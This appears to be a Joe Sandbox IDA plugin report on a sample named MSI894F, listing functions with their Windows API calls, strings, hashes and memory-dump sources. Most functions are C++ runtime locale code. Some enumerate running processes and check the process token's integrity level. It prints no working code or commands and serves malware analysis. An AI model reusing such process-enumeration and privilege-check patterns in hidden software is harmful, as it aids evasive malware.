API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
String ID: $
API String ID: 2507920217-3993045852
Opcode ID: 59b61806c853f1cc3f430c58a2d28ba9bc4dcb621970b9b368c84f800fe418ce
Instruction ID: ede4c179cea9ee03273350681d14c29f5b0dd5c1252a20cff8043490ee349b5b
Opcode Fuzzy Hash: 59b61806c853f1cc3f430c58a2d28ba9bc4dcb621970b9b368c84f800fe418ce
Instruction Fuzzy Hash: 03228E70E08388DFEF11CFA8C948BADBBB5AF45304F148199E449EB291D7759A49CB21

Function 00D4C9C0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D55C66: __EH_prolog3.LIBCMT ref: 00D55C6D
Part of subcall function 00D55C66: std::_Lockit::_Lockit.LIBCPMT ref: 00D55C78
Part of subcall function 00D55C66: std::locale::_Setgloballocale.LIBCPMT ref: 00D55C93
Part of subcall function 00D55C66: std::_Lockit::~_Lockit.LIBCPMT ref: 00D55CE6

std::_Lockit::_Lockit.LIBCPMT ref: 00D4CA1A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4CA80
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D4CB4F

Part of subcall function 00D545A7: __EH_prolog3.LIBCMT ref: 00D545AE

std::_Lockit::~_Lockit.LIBCPMT ref: 00D4CC00
LocalFree.KERNEL32(?,?,?,00D9B6C9,00000000,00D9B6C9), ref: 00D4CD01
__cftoe.LIBCMT ref: 00D4CE5E

Strings

bad locale name, xrefs: 00D4CC41

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
String ID: bad locale name
API String ID: 2085124900-1405518554
Opcode ID: e2bd1edce74271993952cfeaf776b46716b25535c3f747255d426b9680591eef
Instruction ID: 16a9a3239442d55665a29f9b7a39fb4bdf91c29bd524b5a1a934017e8fc0a2d1
Opcode Fuzzy Hash: e2bd1edce74271993952cfeaf776b46716b25535c3f747255d426b9680591eef
Instruction Fuzzy Hash: C3128F71D11248DFDF10DFA8C985BAEBBB5EF09304F184169E855AB381E735AA04CBB1

Function 00D461D0 Relevance: 10.7, APIs: 7, Instructions: 234
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D46242
CloseHandle.KERNEL32(00000000), ref: 00D46285
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00D462E1
OpenProcess.KERNEL32(00000410,00000000,?), ref: 00D462FD
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00D46445
Process32NextW.KERNEL32(?,0000022C), ref: 00D46463
CloseHandle.KERNEL32(00000000), ref: 00D4648E

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Close$HandleProcess32$ChangeCreateFindFirstNextNotificationOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2156003543-0
Opcode ID: 91b59eebb29acbec6cb5f7dabed2d29ce52c3a606bc039498b225d321e74498a
Instruction ID: 7923f51932d990cbd4600261b8f82cae0cbaace6bc29ea6d8233792120905cec
Opcode Fuzzy Hash: 91b59eebb29acbec6cb5f7dabed2d29ce52c3a606bc039498b225d321e74498a
Instruction Fuzzy Hash: 0CA17B70905269DFDF20DF68C848BAEBBB5EF45704F1482D9E419A7280D7B49A84CFA1

Function 00D5D8F6 Relevance: 9.4, APIs: 6, Instructions: 433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D5D8FD
ctype.LIBCPMT ref: 00D5D944

Part of subcall function 00D5D458: __Getctype.LIBCPMT ref: 00D5D467

Part of subcall function 00D579C9: __EH_prolog3.LIBCMT ref: 00D579D0
Part of subcall function 00D579C9: std::_Lockit::_Lockit.LIBCPMT ref: 00D579DA
Part of subcall function 00D579C9: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57A4B

Part of subcall function 00D57AF3: __EH_prolog3.LIBCMT ref: 00D57AFA
Part of subcall function 00D57AF3: std::_Lockit::_Lockit.LIBCPMT ref: 00D57B04
Part of subcall function 00D57AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57B75

Part of subcall function 00D57CB2: __EH_prolog3.LIBCMT ref: 00D57CB9
Part of subcall function 00D57CB2: std::_Lockit::_Lockit.LIBCPMT ref: 00D57CC3
Part of subcall function 00D57CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57D34

Part of subcall function 00D57C1D: __EH_prolog3.LIBCMT ref: 00D57C24
Part of subcall function 00D57C1D: std::_Lockit::_Lockit.LIBCPMT ref: 00D57C2E
Part of subcall function 00D57C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57C9F

Part of subcall function 00D54403: __EH_prolog3.LIBCMT ref: 00D5440A
Part of subcall function 00D54403: std::_Lockit::_Lockit.LIBCPMT ref: 00D54414
Part of subcall function 00D54403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D544BB

collate.LIBCPMT ref: 00D5DA78
numpunct.LIBCPMT ref: 00D5DCF2

Part of subcall function 00D5838F: __EH_prolog3.LIBCMT ref: 00D58396

Part of subcall function 00D580C5: __EH_prolog3.LIBCMT ref: 00D580CC
Part of subcall function 00D580C5: std::_Lockit::_Lockit.LIBCPMT ref: 00D580D6
Part of subcall function 00D580C5: std::_Lockit::~_Lockit.LIBCPMT ref: 00D58147

Part of subcall function 00D581EF: __EH_prolog3.LIBCMT ref: 00D581F6
Part of subcall function 00D581EF: std::_Lockit::_Lockit.LIBCPMT ref: 00D58200
Part of subcall function 00D581EF: std::_Lockit::~_Lockit.LIBCPMT ref: 00D58271

Part of subcall function 00D54403: Concurrency::cancel_current_task.LIBCPMT ref: 00D544C6

Part of subcall function 00D575B6: __EH_prolog3.LIBCMT ref: 00D575BD
Part of subcall function 00D575B6: std::_Lockit::_Lockit.LIBCPMT ref: 00D575C7
Part of subcall function 00D575B6: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57638

__Getcoll.LIBCPMT ref: 00D5DAB8

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

Part of subcall function 00D484C0: LocalAlloc.KERNELBASE(00000040,00000000,00D6839D,00000000,7EBC463A,?,00000000,?,00000000,?,00D8CB8D,000000FF,?,00D417D5,00000000,00D8D3BA), ref: 00D484C6

codecvt.LIBCPMT ref: 00D5DDA3

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
String ID:
API String ID: 613171289-0
Opcode ID: f6a5273f98795be2c0b8d5a2e2f8f14c06364a92f5359a75d74ab2ee95413192
Instruction ID: c7b64cb7617ba5456d3acb5a83e85a2050c6f4fff2029b55339f45da618841d9
Opcode Fuzzy Hash: f6a5273f98795be2c0b8d5a2e2f8f14c06364a92f5359a75d74ab2ee95413192
Instruction Fuzzy Hash: 89E1F3718002169BDF21AF648C4267F7AB6EF41362F15442EFC586B391EF708D589BB2

Function 00D5D8F2 Relevance: 9.3, APIs: 6, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D5D8FD
ctype.LIBCPMT ref: 00D5D944

Part of subcall function 00D5D458: __Getctype.LIBCPMT ref: 00D5D467

collate.LIBCPMT ref: 00D5DA78
__Getcoll.LIBCPMT ref: 00D5DAB8

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

Part of subcall function 00D484C0: LocalAlloc.KERNELBASE(00000040,00000000,00D6839D,00000000,7EBC463A,?,00000000,?,00000000,?,00D8CB8D,000000FF,?,00D417D5,00000000,00D8D3BA), ref: 00D484C6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$AllocGetcollGetctypeH_prolog3LocalLockit::_Lockit::~_collatectype
String ID:
API String ID: 735909071-0
Opcode ID: 43582f26c4ac788bb1522cf59e7cac5f04ca178b1e7cd11183714b52287a9cfd
Instruction ID: 2ada92e23e4747a6642f1879672377e6566f322db7080c140dca95c7e8854e70
Opcode Fuzzy Hash: 43582f26c4ac788bb1522cf59e7cac5f04ca178b1e7cd11183714b52287a9cfd
Instruction Fuzzy Hash: 76C1B17180031A9BDF21AFA0884267F7AB6FF81351F15441EED996B391DF7089489BB1

Function 00D64F20 Relevance: 6.3, APIs: 4, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D64F27
collate.LIBCPMT ref: 00D64F33

Part of subcall function 00D63E70: __EH_prolog3_GS.LIBCMT ref: 00D63E77
Part of subcall function 00D63E70: __Getcoll.LIBCPMT ref: 00D63EDB

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

__Getcoll.LIBCPMT ref: 00D64F76

Part of subcall function 00D63CD4: __EH_prolog3.LIBCMT ref: 00D63CDB
Part of subcall function 00D63CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00D63CE5
Part of subcall function 00D63CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00D63D56

Part of subcall function 00D54403: __EH_prolog3.LIBCMT ref: 00D5440A
Part of subcall function 00D54403: std::_Lockit::_Lockit.LIBCPMT ref: 00D54414
Part of subcall function 00D54403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D544BB

numpunct.LIBCPMT ref: 00D651A6

Part of subcall function 00D484C0: LocalAlloc.KERNELBASE(00000040,00000000,00D6839D,00000000,7EBC463A,?,00000000,?,00000000,?,00D8CB8D,000000FF,?,00D417D5,00000000,00D8D3BA), ref: 00D484C6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
String ID:
API String ID: 2732324234-0
Opcode ID: 58e4137dfd1e4228450e5ce02d40555e02f85b1a36e9cdd52eb2879cb0fa4e5c
Instruction ID: 977887ea8b3f46590e65a2908bdaf8738b25a03edf2caf5ccd9465860baf0185
Opcode Fuzzy Hash: 58e4137dfd1e4228450e5ce02d40555e02f85b1a36e9cdd52eb2879cb0fa4e5c
Instruction Fuzzy Hash: 5191E4B1D01711ABDB20AB749802B7F7AA8EF91360F15451EF859AB285EF70CD409BF1

Function 00D54403 Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D5440A
std::_Lockit::_Lockit.LIBCPMT ref: 00D54414
std::_Lockit::~_Lockit.LIBCPMT ref: 00D544BB
Concurrency::cancel_current_task.LIBCPMT ref: 00D544C6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID:
API String ID: 4244582100-0
Opcode ID: 592f2cb6c76043b3fef0f76d45ca7b57368610eaae5f970f5463f67b53f92f97
Instruction ID: 7261c6e73d96f6ea72672fb3642cb95f0b2c84b50b568bf5a36547581d2fc65c
Opcode Fuzzy Hash: 592f2cb6c76043b3fef0f76d45ca7b57368610eaae5f970f5463f67b53f92f97
Instruction Fuzzy Hash: 0E216B34A106169FCB04EF14C8A1A6CB7A2FF49311F048419ED259B3D1DF70ED54CBA4

Function 00D45F90 Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000008,?,7EBC463A), ref: 00D45FA0
OpenProcessToken.ADVAPI32(00000000), ref: 00D45FA7
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00D45FDC
CloseHandle.KERNEL32(?), ref: 00D45FF2

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 123f0a032025e68b18e1245dec92f45541811b32804c181c6d49ab0b63f385a6
Instruction ID: 6307c17c29ffd7c9bac53f29f05243c319521274355fcf443cf3d37fad34d968
Opcode Fuzzy Hash: 123f0a032025e68b18e1245dec92f45541811b32804c181c6d49ab0b63f385a6
Instruction Fuzzy Hash: 31F0F974144301ABEB109F20EC49BAABBE9FB84705F548819F984C22E0D379951DDB77

Function 00D51A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(7EBC463A,?,0000FFFF), ref: 00D51A4D

Part of subcall function 00D44EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00D44EDD

ExitProcess.KERNEL32 ref: 00D51C27

Part of subcall function 00D48790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00D4880D

Strings

Full command line:, xrefs: 00D51A7E

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: AllocCommandCreateExitFileLineLocalProcess
String ID: Full command line:
API String ID: 1878577176-831861440
Opcode ID: d4456fca5b0403714efc8f053172f574c059c1208e94e4d0ee37193ebc6bee35
Instruction ID: 690f9929581b5e6aaed3ce1f0af517d98a0b7f6e465e3238a961007cbdc3ef3a
Opcode Fuzzy Hash: d4456fca5b0403714efc8f053172f574c059c1208e94e4d0ee37193ebc6bee35
Instruction Fuzzy Hash: F2516C348101689BCF15EB64C899BEEBB75EF11344F1441D8E409672A2EF741F89CBB1

Function 00D47FD0 Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00D47FA8,7EBC463A), ref: 00D48044
GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00D47FA8,7EBC463A), ref: 00D4804E
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00D47FA8,7EBC463A), ref: 00D480AA

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: 8c45137d15fdc5f4d4494a79b495cfdbc13ce1710a3f7bb37483191d5291062e
Instruction ID: 86a643dfb72f79316c85654e3da5d93af0215fea7302f15e535430025e35d78c
Opcode Fuzzy Hash: 8c45137d15fdc5f4d4494a79b495cfdbc13ce1710a3f7bb37483191d5291062e
Instruction Fuzzy Hash: 65318C71A10605AFDB20DFA9CC45BAFFBF9FB44710F10452AE515E7280DBB5A9049BA0

Function 00D55CF3 Relevance: 3.0, APIs: 2, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00D55D02
std::_Lockit::~_Lockit.LIBCPMT ref: 00D55D5A

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 9723f4ef4a8d34fa9f5bc40fec928232bad6827fd740e1d6d01f97d4dfe9f1bd
Instruction ID: 8aec6eb16b9f4bdf11148300d84f919a8d3f524acec9ea8d173bdd2e55f16be6
Opcode Fuzzy Hash: 9723f4ef4a8d34fa9f5bc40fec928232bad6827fd740e1d6d01f97d4dfe9f1bd
Instruction Fuzzy Hash: E0018C36600605EBCF06EF56E865E59BB75EF84311B18409AEC019B3A5DF70EE44CBB0

Function 00D7AA28 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00D823F8,?,00000000,?,?,00D82699,?,00000007,?,?,00D82B92,?,?), ref: 00D7AA3E
GetLastError.KERNEL32(?,?,00D823F8,?,00000000,?,?,00D82699,?,00000007,?,?,00D82B92,?,?), ref: 00D7AA49

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: e09248273481821f09922b0b317cf7ab544b9d8337bc3901c214d2103260cce0
Instruction ID: e9d9b2b53a414a9485c8202ecd866b1d8d409f5f6a94c5ebb6bd7fbcf6eb9a7d
Opcode Fuzzy Hash: e09248273481821f09922b0b317cf7ab544b9d8337bc3901c214d2103260cce0
Instruction Fuzzy Hash: C1E0E67111071467DB113FA4ED09B593B59DB41751F149021F60DD71B1DA349950CBF9

Function 00D5D56A Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D5D571
_Getvals.LIBCPMT ref: 00D5D58D

Part of subcall function 00D570ED: _Maklocstr.LIBCPMT ref: 00D5711E
Part of subcall function 00D570ED: _Maklocstr.LIBCPMT ref: 00D57137
Part of subcall function 00D570ED: _Maklocstr.LIBCPMT ref: 00D57146

Part of subcall function 00D671C1: GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00D64EEC,00000000,00D9B6C9,00000004,00D63D92,00D9B6C9,00000004,00D641A5,00000000,00000000), ref: 00D671DA

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Maklocstr$GetvalsH_prolog3InfoLocale
String ID:
API String ID: 1430434260-0
Opcode ID: 87ac0c9393f2eecfceeedfeed57795341994e452153d5d256d3db0d6779a7b83
Instruction ID: 77f0d9ea7b9409aa908759d2b6f415465e66bf10c90a5a6103e29c2cdb257257
Opcode Fuzzy Hash: 87ac0c9393f2eecfceeedfeed57795341994e452153d5d256d3db0d6779a7b83
Instruction Fuzzy Hash: 72E0B6B0D047149FCB60EFB4840161ABAF4EB08300B108A2AA995C7601DB7895059BB4

Function 00D545A7 Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D545AE

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

Part of subcall function 00D484C0: LocalAlloc.KERNELBASE(00000040,00000000,00D6839D,00000000,7EBC463A,?,00000000,?,00000000,?,00D8CB8D,000000FF,?,00D417D5,00000000,00D8D3BA), ref: 00D484C6

Part of subcall function 00D4C0B0: __Getctype.LIBCPMT ref: 00D4C112

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$AllocGetctypeH_prolog3LocalLockit::_Lockit::~_
String ID:
API String ID: 3791111190-0
Opcode ID: 2c40d3743849511a0ae7637699a58079d13ac5d89e2591246b95e3470ac177b7
Instruction ID: 09c999334a6380a8df37c372e89a4e54ff6ffc2e528391684bdcc4ef0c3b0752
Opcode Fuzzy Hash: 2c40d3743849511a0ae7637699a58079d13ac5d89e2591246b95e3470ac177b7
Instruction Fuzzy Hash: D051C6B1900206ABDF10BF748C86ABF3A68EF4635AF144419FD095A241EF74C94897F3

Function 00D7C72B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00D7AFDA,00000001,00000364,?,00000006,000000FF,?,00D6C282,?,?,?), ref: 00D7C76C

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d2479af5775346ff0873643654b59ee87e8b77af3387a3a4b56bf227fa567ee0
Instruction ID: 41554427f287b2d926bb3ee829f8f8c1aa0bcbf75ab9430e9e06e1955613a982
Opcode Fuzzy Hash: d2479af5775346ff0873643654b59ee87e8b77af3387a3a4b56bf227fa567ee0
Instruction Fuzzy Hash: 3AF0E9316216246FEB292A69DC45A6B379CDF51771B1CE119EC0CE6290FF60D9018FF1

Function 00D7B127 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00D7AAAA,?,00000000,?,00D6C282,?,?,?,?,?,?,00D41668), ref: 00D7B159

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
